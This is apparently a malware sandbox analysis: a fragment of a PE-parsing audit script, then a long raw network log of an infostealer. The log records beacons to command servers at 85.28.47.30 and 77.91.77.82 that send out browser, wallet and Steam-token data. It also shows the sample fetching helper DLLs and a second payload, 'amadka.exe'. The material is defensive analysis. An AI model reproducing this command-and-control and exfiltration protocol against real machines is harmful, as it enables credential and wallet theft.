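if __name__ == "__main__":
    pe = parse_pe(build_sample())
    for name, flags in audit(pe):
        print(f"{name!r:16} {', '.join(sorted(flags)) or '-'}")
    print("raw data ends at byte", expected_file_size(pe))
```

Run as a script it lists the seven sections with their flags: two sections whose names are only spaces and NULs, an `.idata` name padded with spaces, five sections marked both writable and executable, and an entry point at 0x496000 inside `.taggant`, the last section. The raw data of that section ends at byte 1,850,368, the Content-Length in the response headers.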
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 39 31 37 45 39 36 37 44 32 31 33 38 35 39 31 33 37 30 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"66917E967D213859137049------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"Nice------HIIDGCGCBFBAKFHIJDBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGHHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------DBFHDHJKKJDHJJJJKEGHContent-Disposition: form-data; name="message"browsers------DBFHDHJKKJDHJJJJKEGH--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 43 47 44 42 46 43 42 41 4b 45 43 42 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------KJEHCGDBFCBAKECBKKEBContent-Disposition: form-data; name="message"plugins------KJEHCGDBFCBAKECBKKEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="message"fplugins------EBAAAFBGDBKKEBGCFCBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 85.28.47.30Content-Length: 6407Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDHHost: 85.28.47.30Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 85.28.47.30Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 2d 2d 0d 0a Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file"------EGCFIDAFBFBAKFHJEGIJ--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCAAKFBAEGDGCBGCGHHost: 85.28.47.30Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"wallets------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBKFBFCGIEHIDGCFBFBHost: 85.28.47.30Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 4b 46 42 46 43 47 49 45 48 49 44 47 43 46 42 46 42 2d 2d 0d 0a Data Ascii: ------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------GCBKFBFCGIEHIDGCFBFBContent-Disposition: form-data; name="message"files------GCBKFBFCGIEHIDGCFBFB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBGHost: 85.28.47.30Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="file"------IECBGIDAEHCGDGCBKEBG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 85.28.47.30Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 30 39 61 66 34 33 33 66 30 63 36 34 64 35 62 66 30 65 63 32 33 31 62 35 63 62 37 35 33 31 39 36 31 33 34 32 38 63 32 34 63 35 31 34 37 62 32 63 62 39 65 32 35 64 35 65 61 37 30 32 30 33 31 65 63 32 62 61 66 62 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"c09af433f0c64d5bf0ec231b5cb75319613428c24c5147b2cb9e25d5ea702031ec2bafb6------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
